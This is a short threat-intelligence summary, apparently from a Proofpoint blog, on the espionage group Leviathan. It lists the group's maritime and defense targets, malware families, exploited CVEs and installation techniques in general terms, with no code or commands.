Leviathan: Espionage actor spearphishes maritime and defense targets

Proofpoint researchers are tracking an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.

Key takeaways from this research include:

• Industry targeting: The actor targets defense contractors, universities (particularly those with military research ties), legal organizations [3] and government agencies [3]. The actor has particular interest in naval industries including shipbuilding and related research
• Geographical targeting: Targeting includes United States, Western Europe, and South China Sea
• Tools: Custom JavaScript malware known as “Orz” and “NanHaiShu”, Cobalt Strike, the SeDll JavaScript loader, and MockDll dll loader
• Delivery: Emailed attachments and URLs, often employing a fraudulent lookalike domain and stolen branding
• Exploitation: Microsoft Excel and Word documents with macros (sometimes password-protected), very recent vulnerabilities such as CVE-2017-0199 and CVE-2017-8759, and malicious Microsoft Publisher files
• Installation: JavaScript, JavaScript Scriptlets in XML, HTA, PowerShell, WMI, regsvr32, Squiblydoo
• Lateral Movement: The actor sometimes utilizes access at one compromised organization to attack the next. For example, compromised email accounts at one organization were used to send the next wave of malicious attachments to potential victims in the same industry. Similarly the actor attempts to compromise servers within victim organizations and use them for command and control (C&C) for their malware.

This blog traces key activities connected to this actor and examines a number of their tools and techniques. Campaigns and details are presented in reverse chronological order to highlight the group’s most recent activities.

Full Article.